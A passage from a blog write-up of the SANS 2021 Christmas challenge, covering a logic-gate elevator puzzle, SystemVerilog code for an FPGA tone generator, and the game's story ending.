&lt;img alt="The content of the todo table. We can see that the last item says: &amp;quot;With Santa defeated, offer the old man a job as a clerk in the Frost Tower Gift Shop so we can keep an eye on him&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2021/frost_tower_sqli_todo_content.png" /&gt;
&lt;p&gt;Sneaky Jack Frost wants to give Santa a job as a &lt;code&gt;clerk&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-13"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id68"&gt;Objective 13:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="grody-goiterson-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id69"&gt;Grody Goiterson's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, the elevator is out of order.&lt;/p&gt;
&lt;img alt="Grody Goiterson. They're a troll wearing a night blue Christmas jumper with a reindeer with a red nose in the middle. They have brown pants and black shoes. Their hair is purple and frizzy." class="align-center" src="/images/sans-christmas-challenge-2021/grodygoiterson.png" /&gt;
&lt;p&gt;&lt;em&gt;Grody Goiterson says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hrmph. Snrack! Pthbthbthb.&lt;/p&gt;
&lt;p&gt;Gnerphk. Well, on to business.&lt;/p&gt;
&lt;p&gt;I'm Grody Goiterson. ... It's a family name.&lt;/p&gt;
&lt;p&gt;So hey, this is the Frostavator. It runs on some logic chips... that fell
out.&lt;/p&gt;
&lt;p&gt;I put them back in, but I must have mixed them up, because it isn't working
now.&lt;/p&gt;
&lt;p&gt;If you don't know much about logic gates, it's something you should look
up.&lt;/p&gt;
&lt;p&gt;If you help me run the elevator, maybe I can help you with something else.&lt;/p&gt;
&lt;p&gt;I'm pretty good with FPGAs, if that's worth something to ya'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's see the controls:&lt;/p&gt;
&lt;img alt="The Frostavator panel. There's a note taped on that reads &amp;quot;Residential floors are inaccessible during FrostFest. Thanks, JF. The only buttons that are operatable are &amp;quot;Lobby&amp;quot;, &amp;quot;Talks&amp;quot;, and &amp;quot;Jack's office&amp;quot;. Buttons &amp;quot;Floor 4&amp;quot; through &amp;quot;Floor 15&amp;quot; do not work." class="align-center" src="/images/sans-christmas-challenge-2021/frost_elevator_panel.png" /&gt;
&lt;p&gt;Well, Jack's office seems to be on the 16th floor. We could take the stairs,
but it's a pretty steep slope. Let's try and fix the elevator:&lt;/p&gt;
&lt;img alt="The Frostavator panel is now open. We set some kind of circuit board. There are two lines of three spots for logic gates. Let's call them A1, A2, A3 for the first line, and B1, B2, B3 for the second line. Entries for A1 are 0 and 1. Entries for A2 are 1 and 0. Entries for A3 are 0 and 1. Entries for B1 are output of A1 and output of A2. Entries for B2 are output of A1 and output of A3. Entries for B3 are output of A2 and output of A3. The goal is to have B1, B2, and B3 output 1. Indeed there's a label saying &amp;quot;All 3 outputs must be illuminated to power lift&amp;quot;. Below, there is a text area that says &amp;quot;No power!&amp;quot;. The six available logic gates are XOR, NOR, XNOR, AND, NAND, OR." class="align-center" src="/images/sans-christmas-challenge-2021/frost_elevator_panel_open_off.png" /&gt;
&lt;p&gt;Alright, so we have some illuminated inputs going through a maze of logic
gates, and the three outputs must be illuminated to make the elevator work.
So I was messing around with the logic gates and got the correct answer by
chance, so I can't really give you a logic breakdown on how I found it 🤷‍♂️
But here's the correct answer:&lt;/p&gt;
&lt;img alt="The Frostavator panel is now lit up. Keeping the previous definitions of A1, A2, A3, B1, B2, and B3, the correct solution is A1 is AND, A2 is XOR, A3 is XNOR, B1 is NAND, B2 is NOR, B3 is OR. The text area now says &amp;quot;Online!&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2021/frost_elevator_panel_open_on.png" /&gt;
&lt;p&gt;To understand why this works, I advise you read &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Logic_gate#Symbols"&gt;the Wikipedia article on
logic gates&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fpga-programming"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id70"&gt;FPGA Programming&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Oh boy, this one was a doozy! It did remind me of a simpler time when I was
a young lad in engineering school, &lt;a class="reference external" href="https://perso.telecom-paristech.fr/danger/elec203/TH3.pdf"&gt;learning about FPGA programming&lt;/a&gt;, which I
sucked at. And apparently, I still suck at it!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Exercise #4 Objective: Students must prove their design before being
allowed to program an actual device. The student's model must produce a
500Hz, 1KHz, and 2KHz square wave accurately AND accurately produce a
square wave of a randomly chosen frequency. This tool will run the model
under simulation, passing it the appropriate register values and measuring
the frequency of the resulting square wave.&lt;/p&gt;
&lt;p&gt;Important: Students MUST perform all simulation tests with the SAME code.
If the code is changed, all tests will need to be re-run.&lt;/p&gt;
&lt;p&gt;Prof. Qwerty Petabyte&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we must program an FPGA that can produce a square wave with frequencies
500Hz, 1kHz, 2kHz, and any random frequencies. I strongly recommend watching
&lt;a class="reference external" href="https://www.youtube.com/watch?v=GFdG1PJ4QjA"&gt;Prof Petabyte's talk on the subject&lt;/a&gt;.
He introduces an example of SystemVerilog code that makes a LED blink on and
off every second.&lt;/p&gt;
&lt;p&gt;I copied this code hereafter, and I heavily based my solution on it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;module&lt;/span&gt; &lt;span class="n"&gt;blink&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="k"&gt;input&lt;/span&gt; &lt;span class="n"&gt;clock_100Mhz&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// 100 Mhz clock source on Basys 3 FPGA&lt;/span&gt;
    &lt;span class="k"&gt;input&lt;/span&gt; &lt;span class="n"&gt;reset&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// reset&lt;/span&gt;
    &lt;span class="k"&gt;output&lt;/span&gt; &lt;span class="n"&gt;blinky&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;reg&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;26&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="n"&gt;one_second_counter&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;reg&lt;/span&gt; &lt;span class="n"&gt;blinker&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;assign&lt;/span&gt; &lt;span class="n"&gt;blinky&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;blinker&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;always&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;&lt;span class="k"&gt;posedge&lt;/span&gt; &lt;span class="n"&gt;clock_100Mhz&lt;/span&gt; &lt;span class="k"&gt;or&lt;/span&gt; &lt;span class="n"&gt;reset&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;begin&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reset&lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;begin&lt;/span&gt;
                &lt;span class="n"&gt;one_second_counter&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;blinker&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;end&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="k"&gt;begin&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;one_second_counter&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mh"&gt;100000000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                    &lt;span class="k"&gt;begin&lt;/span&gt;
                        &lt;span class="n"&gt;one_second_counter&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                        &lt;span class="n"&gt;blinker&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;blinker&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="mb"&gt;&amp;#39;b1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                    &lt;span class="k"&gt;end&lt;/span&gt;
                &lt;span class="k"&gt;else&lt;/span&gt;
                    &lt;span class="n"&gt;one_second_counter&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;one_second_counter&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;end&lt;/span&gt;
    &lt;span class="k"&gt;end&lt;/span&gt;
&lt;span class="k"&gt;endmodule&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Basically, the code creates a counter. At every positive edge of our reset,
we initialize our variables. At every positive edge of our 100 MHz clock, the
counter is incremented. When it is greater than or equal to 100000000, it means
that one second has passed, (since our clock goes up 100000000 times per
second). Therefore, we reinitialize the counter, and switch the value of
&lt;code&gt;blinker&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, our code basically has to do the same thing, with some specificities:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Our clock runs at 125 MHz, not 100 MHz.&lt;/li&gt;
&lt;li&gt;The frequency is given as &lt;code&gt;NNNNDD&lt;/code&gt; to specify a wanted frequency of
&lt;code&gt;NNNN.DD&lt;/code&gt; Hz.&lt;/li&gt;
&lt;li&gt;We want to generate a square wave that is up for half the period and down
for the other half of the period.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With these constraints in mind, here's the formula to compute the target value
for our counter:&lt;/p&gt;
&lt;p&gt;&lt;span class="formula"&gt;&lt;i&gt;counter&lt;/i&gt;&lt;sub&gt;&lt;i&gt;real&lt;/i&gt;&lt;/sub&gt; = 125000000.0 ⁄ (&lt;i&gt;freq&lt;/i&gt; ⁄ 100.0) ⁄ 2&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;We have to divide &lt;code&gt;freq&lt;/code&gt; by 100 because of the format it is given in. We
have to divide everything by 2 because we want to switch states in the middle
of our period.&lt;/p&gt;
&lt;p&gt;Now, we're supposed to round this counter. Prof Petabytes gives us a nice trick
to know if we need to round up or not:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Good luck and always remember:&lt;/p&gt;
&lt;p&gt;If $rtoi(real_no * 10) - ($rtoi(real_no) * 10) &amp;gt; 4, add 1&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;code&gt;$rtoi&lt;/code&gt; is the SystemVerilog functions that converts a real number to an
integer number.&lt;/p&gt;
&lt;p&gt;We now have everything we need to compute our counter. Here's the final code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// Note: For this lab, we will be working with QRP Corporation&amp;#39;s CQC-11 FPGA.&lt;/span&gt;
&lt;span class="c1"&gt;// The CQC-11 operates with a 125MHz clock.&lt;/span&gt;
&lt;span class="c1"&gt;// Your design for a tone generator must support the following&lt;/span&gt;
&lt;span class="c1"&gt;// inputs/outputs:&lt;/span&gt;
&lt;span class="c1"&gt;// (NOTE: DO NOT CHANGE THE NAMES. OUR AUTOMATED GRADING TOOL&lt;/span&gt;
&lt;span class="c1"&gt;// REQUIRES THE USE OF THESE NAMES!)&lt;/span&gt;
&lt;span class="c1"&gt;// input clk - this will be connected to the 125MHz system clock&lt;/span&gt;
&lt;span class="c1"&gt;// input rst - this will be connected to the system board&amp;#39;s reset bus&lt;/span&gt;
&lt;span class="c1"&gt;// input freq - a 32 bit integer indicating the required frequency&lt;/span&gt;
&lt;span class="c1"&gt;//              (0 - 9999.99Hz) formatted as follows:&lt;/span&gt;
&lt;span class="c1"&gt;//              32&amp;#39;hf1206 or 32&amp;#39;d987654 = 9876.54Hz&lt;/span&gt;
&lt;span class="c1"&gt;// output wave_out - a square wave output of the desired frequency&lt;/span&gt;
&lt;span class="c1"&gt;// you can create whatever other variables you need, but remember&lt;/span&gt;
&lt;span class="c1"&gt;// to initialize them to something!&lt;/span&gt;

&lt;span class="no"&gt;`timescale&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="n"&gt;ns&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="n"&gt;ns&lt;/span&gt;
&lt;span class="k"&gt;module&lt;/span&gt; &lt;span class="n"&gt;tone_generator&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="k"&gt;input&lt;/span&gt; &lt;span class="n"&gt;clk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;input&lt;/span&gt; &lt;span class="n"&gt;rst&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;input&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;31&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="n"&gt;freq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;output&lt;/span&gt; &lt;span class="n"&gt;wave_out&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;// ---- DO NOT CHANGE THE CODE ABOVE THIS LINE ----&lt;/span&gt;
    &lt;span class="c1"&gt;// ---- IT IS NECESSARY FOR AUTOMATED ANALYSIS ----&lt;/span&gt;
    &lt;span class="c1"&gt;// TODO: Add your code below.&lt;/span&gt;
    &lt;span class="c1"&gt;// Remove the following line and add your own implementation.&lt;/span&gt;
    &lt;span class="c1"&gt;// Note: It&amp;#39;s silly, but it compiles...&lt;/span&gt;
    &lt;span class="k"&gt;reg&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mh"&gt;31&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="n"&gt;counter&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;real&lt;/span&gt; &lt;span class="n"&gt;counter_real&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;reg&lt;/span&gt; &lt;span class="n"&gt;wave_status&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;assign&lt;/span&gt; &lt;span class="n"&gt;wave_out&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;wave_status&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;always&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;&lt;span class="k"&gt;posedge&lt;/span&gt; &lt;span class="n"&gt;clk&lt;/span&gt; &lt;span class="k"&gt;or&lt;/span&gt; &lt;span class="k"&gt;posedge&lt;/span&gt; &lt;span class="n"&gt;rst&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;begin&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rst&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;begin&lt;/span&gt;
            &lt;span class="n"&gt;counter&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;counter_real&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mf"&gt;125000000.0&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;freq&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="mf"&gt;100.0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="mh"&gt;2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;$rtoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter_real&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mh"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;$rtoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter_real&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mh"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mh"&gt;4&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;begin&lt;/span&gt;
                &lt;span class="n"&gt;counter_real&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;counter_real&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;end&lt;/span&gt;
            &lt;span class="n"&gt;wave_status&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;end&lt;/span&gt;

        &lt;span class="k"&gt;else&lt;/span&gt;
        &lt;span class="k"&gt;begin&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mh"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;begin&lt;/span&gt;
                &lt;span class="n"&gt;counter&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;$rtoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;counter_real&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="n"&gt;wave_status&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;wave_status&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="mb"&gt;&amp;#39;b1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;end&lt;/span&gt;

            &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="k"&gt;begin&lt;/span&gt;
                &lt;span class="n"&gt;counter&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="n"&gt;counter&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mh"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;end&lt;/span&gt;
        &lt;span class="k"&gt;end&lt;/span&gt;
    &lt;span class="k"&gt;end&lt;/span&gt;
&lt;span class="k"&gt;endmodule&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You'll notice that we're counting &lt;em&gt;down&lt;/em&gt; from our target value, instead of
counting &lt;em&gt;up&lt;/em&gt;, like it was done with the blinking LED. I spent sooo much time
trying to get it to work by counting up, but to no avail. Thanks to John_r2
in the Discord for pointing me in the right direction, and thanks to sand for
pointing me to the explanation in the Discord:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a class="reference external" href="https://discord.com/channels/783055461620514818/917832766551392368/920428227258884096"&gt;pc&lt;/a&gt;:
For all the folks that suffered the same problem as I did. I believe (I'm
no expert) the simulator started timer at the next positive edge of the
clock cycle after the reset button was pushed.  In other words, the time
period between the reset positive edge and next clock positive edge doesn't
count. That will affect your frequency calculation.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://discord.com/channels/783055461620514818/917832766551392368/920450940627210350"&gt;crahan&lt;/a&gt;:
Yup that's exactly correct. The rising edge on the reset can not be taken
into account for your counter. If you count up, you should set your counter
to 1 lower when there's a reset than when you loop back after reaching the
max value in a loop in order to account for that.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Anyway, let's try to run our code:&lt;/p&gt;
&lt;img alt="The FPGA programming exercise. Our code was pasted in the editor. I press on the buttons &amp;quot;Simulate 500Hz&amp;quot;, &amp;quot;Simulate 1kHz&amp;quot;, &amp;quot;Simulate 2kHz&amp;quot;, and &amp;quot;Simulate Random&amp;quot;. At each run, the code generates the square wave with the right frequency. When the four runs are done, I click on the &amp;quot;Program Device&amp;quot; button, that was grayed out until now. We get the message &amp;quot;The device has been successfully programmed!&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2021/fpga.gif" /&gt;
&lt;p&gt;Very nice, we programmed our FPGA chip to play random square waves!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id71"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now that our FPGA is programmed to generate arbitrary frequencies, we can use
it in the Speak &amp;amp; Spell next to us:&lt;/p&gt;
&lt;img alt="A red and yellow Speak and Spell, with the Texas Instrument logo. It has been opened to reveal the integrated circuit. There is a socket where we can isnert our FPGA chip." class="align-center" src="/images/sans-christmas-challenge-2021/speak_and_spell.png" /&gt;
&lt;p&gt;We just have to drag-and-drop our FPGA chip on the socket and...&lt;/p&gt;
&lt;img alt="A spaceship. It's shaped like some kind of egg. It's blue-ish, with six reactors. It has two feet, and a ladder descends from it to the floor." class="align-center" src="/images/sans-christmas-challenge-2021/spaceship.png" /&gt;
&lt;p&gt;A freaking spaceship appears! Let's climb into it to see what's inside:&lt;/p&gt;
&lt;img alt="Inside the spaceship. The interior is dark. There are three trolls, called Buttercup, Erin Fection, and Icy Sickles. We can see Santa on a large screen, like a video call. Jack Frost is there, but he's lost is usual grin." class="align-center" src="/images/sans-christmas-challenge-2021/spaceship_inside.png" /&gt;
&lt;img alt="Icy Sickles. He's a troll wearing a white spacesuit and fake red antlers." class="align-center" src="/images/sans-christmas-challenge-2021/icy_sickles.png" /&gt;
&lt;p&gt;&lt;em&gt;Icy Sickles says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We come in peace! I am Icy Sickles from ice Planet Frost.&lt;/p&gt;
&lt;p&gt;Many centuries ago, we Frostian trolls sent an expedition to study your
planet and peoples.&lt;/p&gt;
&lt;p&gt;Jack Frost, scion of Planet Frost’s ruling family, captained that long-ago
mission, which carried many hundreds of our people to your planet to
conduct our research.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="Erin Fection. She's a troll wearing a white spacesuit. She has long brown hair." class="align-center" src="/images/sans-christmas-challenge-2021/erin_fection.png" /&gt;
&lt;p&gt;&lt;em&gt;Erin Fection says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I am Erin Fection, the pilot of this interstellar spaceship.&lt;/p&gt;
&lt;p&gt;Our first expedition established a base in the land of Oz, where our
researchers became known as “Munchkins.”&lt;/p&gt;
&lt;p&gt;We received a message from them long ago about a Great Schism, where the
Frostian expedition split into two warring factions: Munchkins and Elves.&lt;/p&gt;
&lt;p&gt;Thankfully, they managed to establish an uneasy peace by relocating the
Elves to the North Pole.&lt;/p&gt;
&lt;p&gt;Since then, we have heard nothing from the expedition. They went
interstellar radio silent. Until NOW.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="Buttercup. She's a troll wearing a dress shaped like a Christmas tree, with Christmas lights. She's wearing fake red antlers." class="align-center" src="/images/sans-christmas-challenge-2021/buttercup.png" /&gt;
&lt;p&gt;&lt;em&gt;Butterpcup says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I am Buttercup, Princess of ice Planet Frost.&lt;/p&gt;
&lt;p&gt;Thanks to your help, we received the message from the device summoning us
back to Earth to address the recent unpleasantness.&lt;/p&gt;
&lt;p&gt;We had no idea that Jack Frost would cause such trouble! We sincerely
apologize.&lt;/p&gt;
&lt;p&gt;We will take Jack back home to Planet Frost, along with all the other
trolls.&lt;/p&gt;
&lt;p&gt;The Elves and Munchkins, of course, can remain if they opt to do so.&lt;/p&gt;
&lt;p&gt;Fear not, we WILL bring Jack and any guilty trolls to justice for their
infractions. They will not bother your planet any longer.&lt;/p&gt;
&lt;p&gt;Again, we apologize for all the troubles he has caused, and we sincerely
THANK YOU for your help!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;And&lt;/strong&gt;, now that you've helped us solve everything, feel free to show off
your skills with &lt;a class="reference external" href="https://my-store-c4645f-2.creator-spring.com/"&gt;some swag&lt;/a&gt;
- only for our victors!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="Jack Frost. He's wearing his usual suit, but is now frowning." class="align-center" src="/images/sans-christmas-challenge-2021/jack_frown.png" /&gt;
&lt;p&gt;&lt;em&gt;Jack Frost says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I was just having a little fun. C’mon, man!&lt;/p&gt;
&lt;p&gt;And, I was just getting started! I had such big plans!&lt;/p&gt;
&lt;p&gt;I don’t want to go home!!!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="Santa Claus on a visio-call. He's standing in front of a chimney and a Christmas tree." class="align-center" src="/images/sans-christmas-challenge-2021/santafone.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa Claus says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Frostians have reached out to me via video link. They’ve explained to
me all that has happened.&lt;/p&gt;
&lt;p&gt;I’d like to thank you for your truly excellent work in foiling Jack’s plans
and ensuring that he is finally brought to justice.&lt;/p&gt;
&lt;p&gt;On behalf of all of us here at the North Pole, we wish you and yours a
happy and healthy Holiday Season.&lt;/p&gt;
&lt;p&gt;Thank you and HAPPY HOLIDAYS from me and all of the elves.&lt;/p&gt;
&lt;p&gt;Ho Ho Ho!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Happy Holidays to you too, Santa, to the elves, and to everyone reading this
write-up!&lt;/p&gt;
&lt;p&gt;As usual, thanks to the SANS team for this wonderful Christmas Challenge! I had
so much fun and was really happy to have the opportunity to develop skills that
I don't usually work on, like x64 assembly or FPGA programming.&lt;/p&gt;
&lt;p&gt;See you next year!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="answer-to-the-questions"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id72"&gt;Answer to the questions&lt;/a&gt;&lt;/h2&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Get your bearings at KringleCon.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Talked to Jingle Ringford, got my badge and my WiFi adapter!&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;Help Tangle Coalbox find a wayward elf in Santa's courtyard.&lt;/li&gt;
&lt;/ol&gt;
